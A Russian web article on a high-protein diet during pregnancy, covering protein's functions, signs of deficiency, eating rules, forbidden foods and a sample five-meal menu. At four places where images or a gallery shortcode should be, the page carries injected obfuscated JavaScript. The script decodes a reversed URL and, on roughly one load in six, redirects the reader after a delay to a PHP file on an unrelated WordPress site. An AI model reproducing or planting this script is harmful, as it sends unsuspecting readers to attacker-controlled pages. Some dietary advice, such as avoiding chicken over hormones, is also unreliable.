Особенности белковой диеты при беременности

Переоценить значение правильного питания во время беременности очень сложно – в процессе активного формирования плода крайне важно, что именно ест будущая мама и в каких количествах. Белковая диета, вопреки своему строгому названию, не подразумевает полного исключения углеводов, а направлена исключительно на повышение количества употребляемого белка.

Полностью избавлять организм от запасов жира нельзя – это одно из обязательных условий для нормального вынашивания младенца. Сохранить постоянный вес при беременности просто невозможно – ребенок растет, а значит и показания на весах увеличиваются, но есть большая разница между тем, выйдет ли из роддома счастливая мама со своим нормальным весом или с избыточным.  Соблюдая белковую диету можно не только сохранить свою фигуру, но и избежать ряда осложнений, связанных с нехваткой белка во время беременности.

Зачем нужна белковая диета?

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2015/05/мама-кормит-малыша1-365×271.jpg» alt=»Женщина кормит ребенка грудью» width=»365″ height=»271″ /> Белковая диета полезна как для мамы, так и для малыша

Для того чтобы разобраться в диете и решить придерживаться ее, необходимо четко понимать зачем это нужно. Во время роста и развития плода белок выполняет множество важнейших функций, в их числе:

  • так называемая «строительная» функция – белок необходим для молочных желез матери, формирования и развития самого ребенка;
  • благодаря ему формируются запасы, которые будут использоваться во время  грудного вскармливания;
  • защитная функция – обеспечивает иммунную защиту, являясь составляющим антител к патогенным микроорганизмам;
  • белки отвечают за транспортирование полезных веществ по организму и непосредственно к плоду;
  • если в организме данный элемент в достаточном количестве, то осмотическое давление плазмы будет поддерживаться в рамках нормы, что предотвращает возникновение отеков и мест сгущения крови;
  • участвует в работе свертывающей системы крови.

Если с пищей в организм не поступает достаточное количество белка,  то возникает недостаточность. Распознать такое состояние можно по недостаточному увеличению веса (при нормальном течении беременности прибавка в весе для женщин, не имеющих лишнего веса, не должна превышать 15-ти кг, а для женщин, страдающих ожирением, — не более 7 кг). Грозит белковая недостаточность следующими последствиями:

  • постоянные отеки;
  • задержка в развитии плода, гипотрофия;
  • повышение давления;
  • опасные состояния преэклампсии и эклампсии.

Важно понимать, что во время беременности самое главное – это нормальное развитие ребенка, а поэтому морить себя голодом и тем более худеть в таком положении категорически запрещено. Будущая мама может лишь предпринять меры, дабы не набрать излишней массы, то есть вес естественно должен расти, но в пределах  разумных физиологических рамок.

Решая придерживаться белковой диеты, проконсультируйтесь с врачом. В отдельных ситуациях увеличение употребления белковой пищи может негативно отразиться на состоянии здоровья матери (например, при нарушенной почечной функции).

Основные принципы питания

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2015/05/lori-0001035448-bigwww-365×243.jpg» alt=»Беременная женщина ест за столом» width=»365″ height=»243″ /> Есть нужно понемногу, но часто

Несмотря на похожие названия, белковая диета во время беременности не имеет практически ничего общего с популярной диетой для похудения. Резкое, а тем более полное ограничение потребляемых углеводов недопустимо. Ежесуточное потребление углеводов должно составлять примерно 350 грамм, а потребление белка – не менее 120 грамм.

Первое правило при беременности – кушать понемногу, умеренно, но часто. Специалисты утверждают, что идеальным будет 5 приемов пищи в течение дня, при этом последний прием должен быть хотя бы за 2 часа до сна. При вынашивании младенца стоит избегать любых жареных продуктов, предпочтение лучше отдавать отварным, тушеным и запеченным блюдам. Что касается воды, то пить нужно много, но все же придерживаться разумных рамок.

Для примерного расчета необходимого объема воды используется следующая формула – на 1 килограмм массы 35 миллилитров  жидкости (как чистой воды, так и соков, чаев, морсов и т.д.).  В последние месяцы объемы рекомендуется немного сократить  до 900-1000 мл за сутки.

В рационе беременной женщины обязательно должны быть кисломолочные продукты (кефир, творог, ряженка), мясо, рыба, яйца. Бобовые как источник белка можно употреблять не всегда – такой продукт не всем подходит. Курятину рекомендуют по возможности избегать, так как нередко птицу подкармливают гормонами для быстрого роста, из мяса лучше отдать предпочтение индейке, нежирной свинине, крольчатине. Если имеется возможность приобретать мясные продукты у знакомых фермеров, то  тогда можно смело есть и курятину, зная, что она выращена без антибиотиков и гормонов. Также следует придерживаться следующих правил:

  • большая часть углеводной пищи должна употребляться в первой половине дня, а  ужин лучше сделать исключительно белковым;
  • ежедневно употреблять яйца не стоит, достаточно нескольких раз в неделю;
  • молоко является отличным источником белка, но лучше не пить его более 400 мл в день,  отдавая предпочтение кисломолочным продуктам;
  • во второй половине беременности морепродукты лучше исключить;
  • налегать на экзотические продукты также не стоит – у ребенка может развиться аллергия.

Запрещенные продукты при белковой диете (фото)

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toplay=»true» fg_allowfullscreen=»true» fg_arrow=»true» fg_loop=»true» ids=»8878,8879,8880,8881,8882,8883″]

К числу запрещенных продуктов относятся: кондитерские изделия с жирными кремами, свежий белый хлеб, любые пункты меню ресторанов быстрого питания (фаст-фуд), мороженое, слишком жирные молочные продукты, грибы, консервация, острые специи, алкогольные напитки, жирное мясо, майонез. В качестве источников углеводов лучше употреблять в пищу крупы (овсянку, гречку), овощи, фрукты и изделия из муки грубого помола.

Примерное меню

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2015/05/szhigayushhiy-zhir-sup-365×243.jpg» alt=»Овощной суп» width=»365″ height=»243″ /> Обед — самый важный приём пищи, поэтому он обязательно должен быть полноценным

Распределив  пищу на пять приемов, получим  следующее меню. В завтрак включается углеводная пища – это может быть порция каши, одно яйцо (отварное или омлет, приготовленный на пару) и небольшой кусочек  нежирного сыра (но только сыра, а не плавленого сырка). В качестве напитка подойдет не насыщенный сок или некрепкий чай. На первый прием пищи должна прийтись примерно треть суточного потребления калорий. Второй завтрак (примерно через 3 часа после первого) должен включать в себя преимущественно молочные продукты и фрукты. Предназначен данный прием пищи для легкого перекуса, утоления уже возникшего чувства голода.

Самый значимый прием пищи за день, на который приходится самая большая доля калорий в 40%, — это обед. Обязательные составляющие – суп и горячее блюдо.

Именно в это время лучше всего съесть мяса или рыбы. Суп лучше всего готовить на отваре из овощей, а не на мясном бульоне, а с птицы  перед приготовлением обязательно удалить шкурку. Использовать можно такие специи, как лавровый лист, немного гвоздики или корицы, зелень. Следующий прием пищи – полдник. Обычно это чашечка чая с яблоком или другим фруктом, или стаканчик кефира. Важно избегать соблазна и не есть запрещенных сладостей.

Ужин – последний значимый  прием пищи. Здесь стоит отдать предпочтение мясу или рыбе, в сочетании с овощами. Порция должна быть небольшой, так как перед сном лучше не наедаться. Если в период после ужина и  до сна захотелось кушать, не стоит мучить себя и малыша – можно выпить стаканчик кефира, съесть немного творога.

Adblock
detector